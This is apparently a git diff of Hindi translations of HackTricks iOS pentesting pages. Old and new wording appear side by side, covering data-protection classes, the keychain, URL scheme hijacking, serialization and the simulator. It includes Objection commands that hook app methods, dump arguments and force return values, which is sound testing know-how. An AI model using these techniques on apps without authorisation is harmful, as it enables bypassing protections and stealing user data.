अनुप्रयोग एक विशिष्ट निर्देशिका (`private/var/mobile/Applications/{random ID}`) में स्थापित होते हैं और कुछ प्रणाली क्षेत्रों और कार्यक्षमताओं, जैसे SMS और फोन कॉल, तक सीमित पढ़ने की पहुँच होती है। संरक्षित क्षेत्रों तक पहुँचने पर उपयोगकर्ता अनुमति के लिए एक पॉप-अप अनुरोध उत्पन्न होता है।
# डेटा सुरक्षा
iOS डेवलपर्स को **डेटा सुरक्षा एपीआई** प्रदान करता है, जो सुरक्षित एनक्लेव प्रोसेसर (SEP) के ऊपर निर्मित हैं — क्रिप्टोग्राफिक संचालन और कुंजी प्रबंधन के लिए एक समर्पित सह-प्रोसेसर। SEP डेटा सुरक्षा अखंडता को एक अद्वितीय उपकरण-विशिष्ट कुंजी, उपकरण UID, के माध्यम से सुनिश्चित करता है, जो इसके भीतर एम्बेडेड होता है।
iOS डेवलपर्स को **डेटा सुरक्षा एपीआई** प्रदान करता है, जो सुरक्षित एनक्लेव प्रोसेसर (SEP) के ऊपर निर्मित हैं — क्रिप्टोग्राफिक संचालन और कुंजी प्रबंधन के लिए एक समर्पित सह-प्रोसेसर। SEP डेटा सुरक्षा अखंडता को एक अद्वितीय उपकरण-विशिष्ट कुंजी, उपकरण UID, के माध्यम से सुनिश्चित करता है, जो इसके भीतर निहित है।
फाइल निर्माण के समय, एक अद्वितीय 256-बिट AES एन्क्रिप्शन कुंजी उत्पन्न होती है, जो फाइल की सामग्री को एन्क्रिप्ट करती है। यह एन्क्रिप्शन कुंजी, एक वर्ग ID के साथ, फिर एक वर्ग कुंजी का उपयोग करके एन्क्रिप्ट की जाती है और फाइल के मेटाडेटा में संग्रहीत की जाती है। एक फाइल को डिक्रिप्ट करने में प्रणाली की कुंजी का उपयोग करके मेटाडेटा तक पहुँच प्राप्त करना, वर्ग ID के साथ वर्ग कुंजी को पुनः प्राप्त करना, और फिर फाइल की अद्वितीय एन्क्रिप्शन कुंजी को डिक्रिप्ट करना शामिल है।
iOS डेटा सुरक्षा के लिए **चार सुरक्षा वर्ग** परिभाषित करता है, जो यह निर्धारित करते हैं कि डेटा कब और कैसे पहुँच योग्य है:
iOS डेटा सुरक्षा के लिए **चार सुरक्षा वर्ग** परिभाषित करता है, जो यह निर्धारित करते हैं कि डेटा कब और कैसे पहुँचा जा सकता है:
- **पूर्ण सुरक्षा (NSFileProtectionComplete)**: डेटा तब तक अनुपलब्ध है जब तक उपकरण को उपयोगकर्ता के पासकोड का उपयोग करके अनलॉक नहीं किया जाता।
- **खुला होने पर सुरक्षित (NSFileProtectionCompleteUnlessOpen)**: उपकरण बंद होने के बाद भी फाइल तक पहुँच की अनुमति देता है, बशर्ते फाइल को तब खोला गया हो जब उपकरण अनलॉक किया गया था।
- **पहली उपयोगकर्ता प्रमाणीकरण तक सुरक्षित (NSFileProtectionCompleteUntilFirstUserAuthentication)**: डेटा पहले उपयोगकर्ता अनलॉक के बाद पहुँच योग्य है, भले ही उपकरण फिर से बंद हो जाए।
- **खुला होने पर सुरक्षित (NSFileProtectionCompleteUnlessOpen)**: उपकरण के लॉक होने के बाद भी फाइल तक पहुँच की अनुमति देता है, बशर्ते फाइल को तब खोला गया हो जब उपकरण अनलॉक किया गया था।
- **पहली उपयोगकर्ता प्रमाणीकरण तक सुरक्षित (NSFileProtectionCompleteUntilFirstUserAuthentication)**: डेटा पहले उपयोगकर्ता अनलॉक के बाद उपलब्ध है, भले ही उपकरण फिर से लॉक हो जाए।
- **कोई सुरक्षा नहीं (NSFileProtectionNone)**: डेटा केवल उपकरण UID द्वारा सुरक्षित है, जिससे त्वरित दूरस्थ डेटा मिटाने की सुविधा मिलती है।
सभी वर्गों का एन्क्रिप्शन, `NSFileProtectionNone` को छोड़कर, एक कुंजी से किया जाता है जो उपकरण UID और उपयोगकर्ता के पासकोड दोनों से प्राप्त होती है, यह सुनिश्चित करते हुए कि डिक्रिप्शन केवल सही पासकोड वाले उपकरण पर संभव है। iOS 7 से, डिफ़ॉल्ट सुरक्षा वर्ग "पहली उपयोगकर्ता प्रमाणीकरण तक सुरक्षित" है।
सभी वर्गों का एन्क्रिप्शन, `NSFileProtectionNone` को छोड़कर, एक कुंजी से किया जाता है जो उपकरण UID और उपयोगकर्ता के पासकोड दोनों से प्राप्त होती है, यह सुनिश्चित करते हुए कि डिक्रिप्शन केवल सही पासकोड वाले उपकरण पर संभव है। iOS 7 से आगे, डिफ़ॉल्ट सुरक्षा वर्ग "पहली उपयोगकर्ता प्रमाणीकरण तक सुरक्षित" है।
डेवलपर्स [**FileDP**](https://github.com/abjurato/FileDp-Source) का उपयोग कर सकते हैं, जो iPhone पर फाइलों के डेटा सुरक्षा वर्ग की जांच करने के लिए एक उपकरण है।
```python
@ -34,22 +34,22 @@ python filedp.py /path/to/check
iOS में, एक **कीचेन** एक सुरक्षित **एन्क्रिप्टेड कंटेनर** के रूप में कार्य करता है जो **संवेदनशील जानकारी** को संग्रहीत करता है, जिसे केवल उस एप्लिकेशन द्वारा या उन लोगों द्वारा एक्सेस किया जा सकता है जिन्हें स्पष्ट रूप से अधिकृत किया गया है। यह एन्क्रिप्शन एक अद्वितीय **पासवर्ड द्वारा मजबूत किया गया है जो iOS द्वारा उत्पन्न होता है**, जो स्वयं **AES** के साथ एन्क्रिप्ट किया गया है। यह एन्क्रिप्शन प्रक्रिया एक **PBKDF2 फ़ंक्शन** का उपयोग करती है, जो उपयोगकर्ता के पासकोड को एक नमक के साथ जोड़ती है जो डिवाइस के **UID** से प्राप्त होता है, एक घटक जिसे केवल **सुरक्षित एन्क्लेव चिपसेट** एक्सेस कर सकता है। परिणामस्वरूप, भले ही उपयोगकर्ता का पासकोड ज्ञात हो, कीचेन की सामग्री किसी अन्य डिवाइस पर अनुपलब्ध रहती है सिवाय उस डिवाइस के जहां उन्हें मूल रूप से एन्क्रिप्ट किया गया था।
**कीचेन डेटा का प्रबंधन और एक्सेस** **`securityd` डेमन** द्वारा किया जाता है, जो विशिष्ट ऐप अधिकारों जैसे `Keychain-access-groups` और `application-identifier` पर आधारित होता है।
**कीचेन डेटा का प्रबंधन और एक्सेस** **`securityd` डेमन** द्वारा किया जाता है, जो विशिष्ट ऐप अधिकारों जैसे `Keychain-access-groups` और `application-identifier` पर आधारित है।
### **कीचेन एपीआई ऑपरेशंस**
कीचेन एपीआई, जो [Apple के कीचेन सेवाओं के दस्तावेज़](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html) में विस्तृत है, सुरक्षित संग्रह प्रबंधन के लिए आवश्यक कार्य प्रदान करता है:
कीचेन एपीआई, [Apple के Keychain Services दस्तावेज़](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html) में विस्तृत, सुरक्षित संग्रह प्रबंधन के लिए आवश्यक कार्य प्रदान करता है:
- **`SecItemAdd`**: कीचेन में एक नया आइटम जोड़ता है।
- **`SecItemUpdate`**: कीचेन में एक मौजूदा आइटम को अपडेट करता है।
- **`SecItemCopyMatching`**: कीचेन से एक आइटम प्राप्त करता है।
- **`SecItemDelete`**: कीचेन से एक आइटम हटाता है।
- **`SecItemDelete`**: कीचेन से एक आइटम को हटाता है।
कीचेन पासवर्ड को ब्रूट-फोर्स करना या तो एन्क्रिप्टेड कुंजी पर सीधे हमला करन या डिवाइस पर पासकोड का अनुमान लगाने का प्रयास करन शामिल है, जिसे असफल प्रयासों के बीच सुरक्षित एन्क्लेव द्वारा लागू किए गए विलंब से काफी हद तक बाधित किया जाता है।
कीचेन पासवर्ड को ब्रूट-फोर्स करना एन्क्रिप्टेड कुंजी पर सीधे हमला करन या डिवाइस पर पासकोड का अनुमान लगाने का प्रयास करने में शामिल है, जिसे असफल प्रयासों के बीच सुरक्षित एन्क्लेव द्वारा लागू किए गए विलंब से काफी हद तक बाधित किया जाता है।
### **कीचेन आइटम डेटा सुरक्षा कॉन्फ़िगर करना**
कीचेन आइटम के लिए डेटा सुरक्षा स्तर को आइटम निर्माण या अपडेट के दौरान `kSecAttrAccessible` विशेषता का उपयोग करके सेट किया जाता है। ये स्तर, [Apple द्वारा निर्दिष्ट](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), यह निर्धारित करते हैं कि कीचेन आइटम कब और कैसे एक्सेस किए जा सकते हैं:
कीचेन आइटम के लिए डेटा सुरक्षा स्तर आइटम निर्माण या अपडेट के दौरान `kSecAttrAccessible` विशेषता का उपयोग करके सेट किए जाते हैं। ये स्तर, [Apple द्वारा निर्दिष्ट](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), यह निर्धारित करते हैं कि कीचेन आइटम कब और कैसे एक्सेस किए जा सकते हैं:
- **`kSecAttrAccessibleAlways`**: किसी भी समय, डिवाइस लॉक स्थिति की परवाह किए बिना एक्सेस किया जा सकता है।
- **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: हमेशा एक्सेस किया जा सकता है, लेकिन बैकअप में शामिल नहीं है।
@ -68,7 +68,7 @@ iOS में, एक **कीचेन** एक सुरक्षित **ए
### **कीचेन डेटा की स्थिरता**
ऐप विशेष डेटा के विपरीत जो ऐप अनइंस्टॉलेशन पर हटा दिया जाता है, **कीचेन डेटा डिवाइस पर बना रहता है**। यह विशेषता एक सेकंड-हैंड डिवाइस के नए मालिकों को पिछले मालिक के एप्लिकेशन डेटा तक पहुंचने में सक्षम बना सकती है, बस ऐप्स को फिर से इंस्टॉल करके। डेवलपर्स को इस जोखिम को कम करने के लिए ऐप इंस्टॉलेशन या लॉगआउट के दौरान कीचेन डेटा को सक्रिय रूप से साफ़ करने की सलाह दी जाती है। यहां एक स्विफ्ट कोड उदाहरण है जो पहले ऐप लॉन्च पर कीचेन डेटा को साफ़ करने का प्रदर्शन करता है:
ऐप विशेष डेटा के विपरीत जो ऐप अनइंस्टॉल होने पर हटा दिया जाता है, **कीचेन डेटा डिवाइस पर स्थायी रहता है**। यह विशेषता एक सेकंड-हैंड डिवाइस के नए मालिकों को पिछले मालिक के एप्लिकेशन डेटा तक पहुंचने में सक्षम बना सकती है, बस ऐप्स को फिर से इंस्टॉल करके। डेवलपर्स को इस जोखिम को कम करने के लिए ऐप इंस्टॉलेशन या लॉगआउट के दौरान कीचेन डेटा को सक्रिय रूप से साफ़ करने की सलाह दी जाती है। यहां एक स्विफ्ट कोड उदाहरण है जो पहले ऐप लॉन्च पर कीचेन डेटा को साफ़ करने का प्रदर्शन करता है:
```swift
let userDefaults = UserDefaults.standard
@ -96,7 +96,7 @@ IPA फ़ाइल के साथ काम करते समय, निम
1. IPA को अनज़िप करें।
2. `Payload/<appname>.app/` के भीतर `Info.plist` फ़ाइल को खोजें।
3. यदि आवश्यक हो, तो फ़ाइल को XML प्रारूप में परिवर्तित करें, ताकि निरीक्षण करना आसान हो सके
3. यदि आवश्यक हो, तो फ़ाइल को XML प्रारूप में परिवर्तित करें, ताकि निरीक्षण करना आसान हो।
उदाहरण के लिए, `Info.plist` फ़ाइल में purpose strings इस प्रकार दिख सकते हैं:
```xml

10
src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
View File

@ -6,11 +6,11 @@
कस्टम URL स्कीम ऐप्स को एक कस्टम प्रोटोकॉल का उपयोग करके संवाद करने की अनुमति देती हैं, जैसा कि [Apple Developer Documentation](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1) में विस्तृत किया गया है। इन स्कीमों को ऐप द्वारा घोषित किया जाना चाहिए, जो फिर उन स्कीमों के अनुसार आने वाले URLs को संभालता है। सभी URL पैरामीटर को **मान्य करना** और **कोई भी गलत URLs को अस्वीकार करना** महत्वपूर्ण है ताकि इस वेक्टर के माध्यम से हमलों को रोका जा सके।
एक उदाहरण दिया गया है जहा URI `myapp://hostname?data=123876123` एक विशिष्ट एप्लिकेशन क्रिया को सक्रिय करता है। एक ज्ञात भेद्यता Skype Mobile ऐप में थी, जिसने `skype://` प्रोटोकॉल के माध्यम से अनधिकृत कॉल क्रियाओं की अनुमति दी। पंजीकृत स्कीमों को ऐप के `Info.plist` में `CFBundleURLTypes` के तहत पाया जा सकता है। दुर्भावनापूर्ण ऐप्स इसको संवेदनशील जानकारी को इंटरसेप्ट करने के लिए URIs को फिर से पंजीकृत करके शोषण कर सकते हैं।
एक उदाहरण दिया गया है जहा URI `myapp://hostname?data=123876123` एक विशिष्ट एप्लिकेशन क्रिया को सक्रिय करता है। एक ज्ञात भेद्यता Skype Mobile ऐप में थी, जिसने `skype://` प्रोटोकॉल के माध्यम से अनधिकृत कॉल क्रियाओं की अनुमति दी। पंजीकृत स्कीम ऐप के `Info.plist` में `CFBundleURLTypes` के तहत पाई जा सकती हैं। दुर्भावनापूर्ण ऐप्स इसको संवेदनशील जानकारी को इंटरसेप्ट करने के लिए URIs को फिर से पंजीकृत करके शोषण कर सकते हैं।
### Application Query Schemes Registration
iOS 9.0 से, यह जांचने के लिए कि क्या एक ऐप उपलब्ध है, `canOpenURL:` को `Info.plist` में `LSApplicationQueriesSchemes` के तहत URL स्कीमों की घोषणा करने की आवश्यकता होती है। यह एक ऐप द्वारा क्वेरी की जा सकने वाली स्कीमों को 50 तक सीमित करता है, जिससे ऐप enumeration को रोककर गोपनीयता बढ़ती है।
iOS 9.0 से, यह जांचने के लिए कि क्या एक ऐप उपलब्ध है, `canOpenURL:` को `Info.plist` में `LSApplicationQueriesSchemes` के तहत URL स्कीमों की घोषणा करने की आवश्यकता होती है। यह एक ऐप द्वारा क्वेरी की जा सकने वाली स्कीमों को 50 तक सीमित करता है, जिससे ऐप एन्यूमरेशन को रोककर गोपनीयता बढ़ती है।
```xml
<key>LSApplicationQueriesSchemes</key>
<array>
@ -20,7 +20,7 @@ iOS 9.0 से, यह जांचने के लिए कि क्या
```
### URL हैंडलिंग और मान्यता का परीक्षण
डेवलपर्स को URL पथ निर्माण और मान्यता को समझने के लिए स्रोत कोड में विशिष्ट विधियों का निरीक्षण करना चाहिए, जैसे `application:didFinishLaunchingWithOptions:` और `application:openURL:options:`। उदाहरण के लिए, Telegram URL खोलने के लिए विभिन्न विधियों का उपयोग करता है:
डेवलपर्स को URL पथ निर्माण और मान्यता को समझने के लिए स्रोत कोड में विशिष्ट विधियों का निरीक्षण करना चाहिए, जैसे `application:didFinishLaunchingWithOptions:` और `application:openURL:options:`। उदाहरण के लिए, Telegram URLs खोलने के लिए विभिन्न विधियों का उपयोग करता है:
```swift
func application(_ application: UIApplication, open url: URL, sourceApplication: String?) -> Bool {
self.openUrl(url: url)
@ -48,7 +48,7 @@ return true
`openURL:options:completionHandler:` जैसे तरीके अन्य ऐप्स के साथ बातचीत करने के लिए URL खोलने के लिए महत्वपूर्ण हैं। ऐप के स्रोत कोड में ऐसे तरीकों का उपयोग पहचानना बाहरी संचार को समझने के लिए कुंजी है।
### अप्रचलित तरीकों क परीक्षण
### अप्रचलित तरीकों के लिए परीक्षण
URL खोलने को संभालने वाले अप्रचलित तरीके, जैसे `application:handleOpenURL:` और `openURL:`, की पहचान की जानी चाहिए और सुरक्षा निहितार्थों के लिए समीक्षा की जानी चाहिए।
@ -62,7 +62,7 @@ Watching for crashes from iGoat...
No logs were moved.
Opened URL: iGoat://?contactNumber=0&message=0
```
## कस्टम यूआरएल स्कीम हाइजैकिंग
## कस्टम URL स्कीम हाइजैकिंग
According to [**this post**](https://evanconnelly.github.io/post/ios-oauth/), malicious apps could **register other apps custom schemes,** then the malicious app can open a browser that has all the cookies of the Safari App with [ASWebAuthenticationSession](https://developer.apple.com/documentation/authenticationservices/aswebauthenticationsession/2990952-init#parameters).&#x20;

12
src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md
View File

@ -1,7 +1,7 @@
{{#include ../../banners/hacktricks-training.md}}
इस अनुभाग के लिए उपकरण [**Objection**](https://github.com/sensepost/objection) का उपयोग किया जाएगा।\
एक आपत्ति का सत्र प्राप्त करने के लिए कुछ इस तरह से शुरू करें:
कुछ इस तरह से एक objection का सत्र प्राप्त करने से शुरू करें:
```bash
objection -d --gadget "iGoat-Swift" explore
objection -d --gadget "OWASP.iGoat-Swift" explore
@ -127,7 +127,7 @@ AAAttestationSigner
[...]
```
- `ios hooking search classes <search_term>`: एक वर्ग खोजें जिसमें एक स्ट्रिंग हो। आप मुख्य ऐप पैकेज नाम से संबंधित कुछ अद्वितीय शब्द खोज सकते हैं ताकि ऐप के मुख्य वर्गों को खोजा जा सके जैसे उदाहरण में:
- `ios hooking search classes <search_term>`: एक वर्ग खोजें जिसमें एक स्ट्रिंग हो। आप मुख्य ऐप पैकेज नाम से संबंधित कुछ अद्वितीय शब्द खोज सकते हैं ताकि ऐप के मुख्य वर्गों को पाया जा सके जैसे उदाहरण में:
```bash
ios hooking search classes iGoat
@ -183,9 +183,9 @@ ios hooking search methods cvv
अब जब आपने एप्लिकेशन द्वारा उपयोग किए गए **क्लास और मॉड्यूल की गणना की है**, तो आप कुछ **दिलचस्प क्लास और विधि नाम** पा सकते हैं।
## एक वर्ग क सभी विधियों को हुक करें
## एक वर्ग क सभी विधियों को हुक करें
- `ios hooking watch class <class_name>`: एक वर्ग की सभी विधियों को हुक करें, सभी प्रारंभिक पैरामीटर और लौटने वाले मानों को डंप करें
- `ios hooking watch class <class_name>`: एक वर्ग की सभी विधियों को हुक करें, सभी प्रारंभिक पैरामीटर और रिटर्न को डंप करें
```bash
ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController
@ -193,13 +193,13 @@ ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController
## एकल विधि को हुक करें
- `ios hooking watch method "-[<class_name> <method_name>]" --dump-args --dump-return --dump-backtrace`: एक वर्ग की एक विशिष्ट विधि को हुक करें, प्रत्येक बार इसे कॉल करने पर विधि के पैरामीटर, बैकट्रेस और लौटने वाले मानों को डंप करें
- `ios hooking watch method "-[<class_name> <method_name>]" --dump-args --dump-return --dump-backtrace`: एक वर्ग की एक विशिष्ट विधि को हुक करें जो विधि के प्रत्येक कॉल पर पैरामीटर, बैकट्रेस और रिटर्न को डंप करती है
```bash
ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return
```
## बूलियन लौटने को बदलें
## बूलियन रिटर्न बदलें
- `ios hooking set return_value "-[<class_name> <method_name>]" false`: यह चयनित विधि को निर्दिष्ट बूलियन लौटाने के लिए बनाएगा

8
src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
View File

@ -4,7 +4,7 @@ Code और अधिक जानकारी [https://mas.owasp.org/MASTG/iOS/
## iOS विकास में ऑब्जेक्ट सीरियलाइजेशन
iOS में, **ऑब्जेक्ट सीरियलाइजेशन** का अर्थ है ऑब्जेक्ट्स को एक ऐसे प्रारूप में परिवर्तित करना जिसे आसानी से संग्रहीत या प्रसारित किया जा सके, और फिर आवश्यकता पड़ने पर इस प्रारूप से उन्हें पुनर्निर्मित करना। दो मुख्य प्रोटोकॉल, **`NSCoding`** और **`NSSecureCoding`**, इस प्रक्रिया को Objective-C या `NSObject` उपवर्गों के लिए सरल बनाते हैं, जिससे ऑब्जेक्ट्स को **`NSData`** में सीरियलाइज किया जा सकता है, जो बाइट बफर्स को लपेटता है।
iOS में, **ऑब्जेक्ट सीरियलाइजेशन** का अर्थ है ऑब्जेक्ट्स को एक ऐसे प्रारूप में परिवर्तित करना जिसे आसानी से संग्रहीत या प्रसारित किया जा सके, और फिर आवश्यकता पड़ने पर इस प्रारूप से उन्हें पुनर्निर्मित करना। दो मुख्य प्रोटोकॉल, **`NSCoding`** और **`NSSecureCoding`**, इस प्रक्रिया को Objective-C या `NSObject` उपवर्गों के लिए सरल बनाते हैं, जिससे ऑब्जेक्ट्स को **`NSData`** में सीरियलाइज किया जा सकता है, जो बाइट बफर को लपेटता है।
### **`NSCoding`** कार्यान्वयन
@ -27,7 +27,7 @@ self.init(x: aDecoder.decodeDouble(forKey: "x"), name: name)
```
### **`NSSecureCoding` के साथ सुरक्षा बढ़ाना**
उन कमजोरियों को कम करने के लिए जहां हमलावर पहले से निर्मित वस्तुओं में डेटा इंजेक्ट करते हैं, **`NSSecureCoding`** एक उन्नत प्रोटोकॉल प्रदान करता है। `NSSecureCoding` का पालन करने वाली कक्षाओं को डिकोडिंग के दौरान वस्तुओं के प्रकार की पुष्टि करनी चाहिए, यह सुनिश्चित करते हुए कि केवल अपेक्षित वस्तु प्रकारों को ही स्थापित किया जाए। हालाँकि, यह ध्यान रखना महत्वपूर्ण है कि जबकि `NSSecureCoding` प्रकार की सुरक्षा को बढ़ाता है, यह डेटा को एन्क्रिप्ट नहीं करता है या इसकी अखंडता सुनिश्चित नहीं करता है, संवेदनशील जानकारी की सुरक्षा के लिए अतिरिक्त उपायों की आवश्यकता होती है:
हमलावरों द्वारा पहले से निर्मित वस्तुओं में डेटा इंजेक्ट करने की कमजोरियों को कम करने के लिए, **`NSSecureCoding`** एक उन्नत प्रोटोकॉल प्रदान करता है। `NSSecureCoding` का पालन करने वाली कक्षाओं को डिकोडिंग के दौरान वस्तुओं के प्रकार की पुष्टि करनी चाहिए, यह सुनिश्चित करते हुए कि केवल अपेक्षित वस्तु प्रकारों को ही स्थापित किया जाए। हालाँकि, यह ध्यान रखना महत्वपूर्ण है कि जबकि `NSSecureCoding` प्रकार की सुरक्षा को बढ़ाता है, यह डेटा को एन्क्रिप्ट नहीं करता है या इसकी अखंडता सुनिश्चित नहीं करता है, संवेदनशील जानकारी की सुरक्षा के लिए अतिरिक्त उपायों की आवश्यकता होती है:
```swift
static var supportsSecureCoding: Bool {
return true
@ -44,7 +44,7 @@ let customPoint = NSKeyedUnarchiver.unarchiveObjectWithFile("/path/to/archive")
```
### Using `Codable` for Simplified Serialization
Swift का `Codable` प्रोटोकॉल `Decodable` और `Encodable` को मिलाता है, जिससे `String`, `Int`, `Double` आदि जैसे ऑब्जेक्ट्स का एन्कोडिंग और डिकोडिंग बिना अतिरिक्त प्रयास के किया जा सकता है:
स्विफ्ट का `Codable` प्रोटोकॉल `Decodable` और `Encodable` को मिलाता है, जिससे `String`, `Int`, `Double` आदि जैसे ऑब्जेक्ट्स का एन्कोडिंग और डिकोडिंग बिना अतिरिक्त प्रयास के किया जा सकता है:
```swift
struct CustomPointStruct: Codable {
var x: Double
@ -55,7 +55,7 @@ var name: String
## JSON और XML एन्कोडिंग विकल्प
स्थानीय समर्थन के अलावा, कई तृतीय-पक्ष पुस्तकालय JSON और XML एन्कोडिंग/डिकोडिंग क्षमताएँ प्रदान करते हैं, प्रत्येक के अपने प्रदर्शन विशेषताएँ और सुरक्षा विचार होते हैं। इन पुस्तकालयों का सावधानीपूर्वक चयन करना अनिवार्य है, विशेष रूप से XXE (XML एक्सटर्नल एंटिटीज़) हमलों जैसी कमजोरियों को कम करने के लिए पार्सर्स को कॉन्फ़िगर करके बाहरी एंटिटी प्रोसेसिंग को रोकना।
स्थानीय समर्थन के अलावा, कई तृतीय-पक्ष पुस्तकालय JSON और XML एन्कोडिंग/डिकोडिंग क्षमताएँ प्रदान करते हैं, प्रत्येक के अपने प्रदर्शन विशेषताएँ और सुरक्षा विचार होते हैं। इन पुस्तकालयों का सावधानीपूर्वक चयन करना अनिवार्य है, विशेष रूप से XXE (XML बाहरी संस्थाएँ) हमलों जैसी कमजोरियों को कम करने के लिए पार्सरों को कॉन्फ़िगर करके बाहरी संस्थाओं की प्रोसेसिंग को रोकना।
### सुरक्षा विचार

36
src/mobile-pentesting/ios-pentesting/ios-testing-environment.md
View File

@ -4,10 +4,10 @@
## Apple Developer Program
एक **प्रावधान पहचान** एक संग्रह है सार्वजनिक और निजी कुंजियों का जो एक Apple डेवलपर खाते से संबंधित है। **ऐप्स पर हस्ताक्षर** करने के लिए आपको **99$/वर्ष** का भुगतान करना होगा **Apple Developer Program** में पंजीकरण करने के लिए ताकि आप अपनी प्रावधान पहचान प्राप्त कर सकें। इसके बिना, आप भौतिक डिवाइस पर स्रोत कोड से एप्लिकेशन नहीं चला सकेंगे। ऐसा करने का एक और विकल्प है **जेलब्रोकन डिवाइस** का उपयोग करना।
एक **प्रावधान पहचान** एक Apple डेवलपर खाते से संबंधित सार्वजनिक और निजी कुंजियों का संग्रह है। **ऐप्स पर हस्ताक्षर** करने के लिए आपको **99$/वर्ष** का भुगतान करना होगा ताकि आप **Apple Developer Program** में पंजीकरण कर सकें और अपनी प्रावधान पहचान प्राप्त कर सकें। इसके बिना, आप भौतिक डिवाइस पर स्रोत कोड से एप्लिकेशन नहीं चला सकेंगे। ऐसा करने का एक और विकल्प **जेलब्रोकन डिवाइस** का उपयोग करना है
Xcode 7.2 से Apple ने एक विकल्प प्रदान किया है **मुफ्त iOS विकास प्रावधान प्रोफ़ाइल** बनाने के लिए जो आपको एक असली iPhone पर अपने एप्लिकेशन को लिखने और परीक्षण करने की अनुमति देता है। _Xcode_ --> _Preferences_ --> _Accounts_ --> _+_ (अपने क्रेडेंशियल्स के लिए नया एप्लि ID जोड़ें) --> _Click on the Apple ID created_ --> _Manage Certificates_ --> _+_ (Apple Development) --> _Done_\
\_\_फिर, अपने iPhone में अपने एप्लिकेशन को चलाने के लिए आपको पहले **iPhone को कंप्यूटर पर भरोसा करने के लिए संकेत देना होगा।** फिर, आप **Xcode से मोबाइल में एप्लिकेशन चलाने की कोशिश कर सकते हैं,** लेकिन एक त्रुटि दिखाई देगी। इसलिए _Settings_ --> _General_ --> _Profiles and Device Management_ पर जाएं --> अविश्वसनीय प्रोफ़ाइल का चयन करें और "**Trust**" पर क्लिक करें।
Xcode 7.2 से Apple ने एक **मुफ्त iOS विकास प्रावधान प्रोफ़ाइल** बनाने का विकल्प प्रदान किया है जो आपको एक असली iPhone पर अपने एप्लिकेशन को लिखने और परीक्षण करने की अनुमति देता है। _Xcode_ --> _Preferences_ --> _Accounts_ --> _+_ (अपने क्रेडेंशियल्स के लिए नया Appli ID जोड़ें) --> _बनाए गए Apple ID पर क्लिक करें_ --> _Manage Certificates_ --> _+_ (Apple Development) --> _Done_\
\_\_फिर, अपने iPhone पर एप्लिकेशन चलाने के लिए आपको पहले **iPhone को कंप्यूटर पर भरोसा करने के लिए इंगित करना होगा।** फिर, आप **Xcode से मोबाइल में एप्लिकेशन चलाने की कोशिश कर सकते हैं,** लेकिन एक त्रुटि दिखाई देगी। इसलिए _Settings_ --> _General_ --> _Profiles and Device Management_ पर जाएं --> अविश्वसनीय प्रोफ़ाइल का चयन करें और "**Trust**" पर क्लिक करें।
ध्यान दें कि **एक ही हस्ताक्षर प्रमाणपत्र द्वारा हस्ताक्षरित एप्लिकेशन सुरक्षित तरीके से संसाधनों को साझा कर सकते हैं, जैसे कि कीचेन आइटम**
@ -16,15 +16,15 @@ Xcode 7.2 से Apple ने एक विकल्प प्रदान क
## **Simulator**
> [!NOTE]
> ध्यान दें कि एक **सिम्युलेटर एक एमुलेटर के समान नहीं है**। सिम्युलेटर केवल डिवाइस के व्यवहार और कार्यों का अनुकरण करता है लेकिन वास्तव में उनका उपयोग नहीं करता है।
> ध्यान दें कि **सिम्युलेटर एक एमुलेटर के समान नहीं है**। सिम्युलेटर केवल डिवाइस के व्यवहार और कार्यों का अनुकरण करता है लेकिन वास्तव में उनका उपयोग नहीं करता है।
### **Simulator**
आपको जो पहली बात जाननी है वह यह है कि **सिम्युलेटर के अंदर एक पेंटेस्ट करना जेलब्रोकन डिवाइस की तुलना में बहुत अधिक सीमित होगा**।
आपको जो पहली बात जाननी है वह यह है कि **सिम्युलेटर के अंदर पेंटेस्ट करना जेलब्रोकन डिवाइस की तुलना में बहुत अधिक सीमित होगा**।
iOS ऐप बनाने और समर्थन के लिए आवश्यक सभी उपकरण **केवल आधिकारिक रूप से Mac OS पर समर्थित हैं**।\
Apple का वास्तविक उपकरण iOS एप्लिकेशन बनाने/डीबग करने/इंस्ट्रूमेंट करने के लिए **Xcode** है। इसका उपयोग अन्य घटकों को डाउनलोड करने के लिए किया जा सकता है जैसे कि **सिम्युलेटर** और विभिन्न **SDK** **संस्करण** जो आपके ऐप को बनाने और **परीक्षण** करने के लिए आवश्यक हैं।\
यह अत्यधिक अनुशंसित है कि आप **Xcode** को **आधिकारिक ऐप स्टोर** से **डाउनलोड** करें। अन्य संस्करणों में मैलवेयर हो सकता है।
**आधिकारिक ऐप स्टोर** से Xcode **डाउनलोड** करने की अत्यधिक सिफारिश की जाती है। अन्य संस्करणों में मैलवेयर हो सकता है।
सिम्युलेटर फ़ाइलें `/Users/<username>/Library/Developer/CoreSimulator/Devices` में पाई जा सकती हैं।
@ -37,14 +37,14 @@ Apple का वास्तविक उपकरण iOS एप्लिके
### Applications in the Simulator
`/Users/<username>/Library/Developer/CoreSimulator/Devices` के अंदर आप सभी **स्थापित सिम्युलेटर** पा सकते हैं। यदि आप एक एप्लिकेशन के फ़ाइलों तक पहुँच प्राप्त करना चाहते हैं जो एक एमुलेटर के अंदर बनाई गई है, तो यह जानना मुश्किल हो सकता है **किसमें ऐप स्थापित है****सही UID** खोजने का एक त्वरित तरीका है सिम्युलेटर में ऐप को निष्पादित करना और निष्पादित करना:
`/Users/<username>/Library/Developer/CoreSimulator/Devices` के अंदर आप सभी **स्थापित सिम्युलेटर** पा सकते हैं। यदि आप उन फ़ाइलों तक पहुँच प्राप्त करना चाहते हैं जो एक एमुलेटर के अंदर बनाई गई एप्लिकेशन की है, तो यह जानना मुश्किल हो सकता है कि **किसमें ऐप स्थापित है****सही UID** खोजने का एक त्वरित तरीका है कि आप सिम्युलेटर में ऐप चलाएँ और निष्पादित करें:
```bash
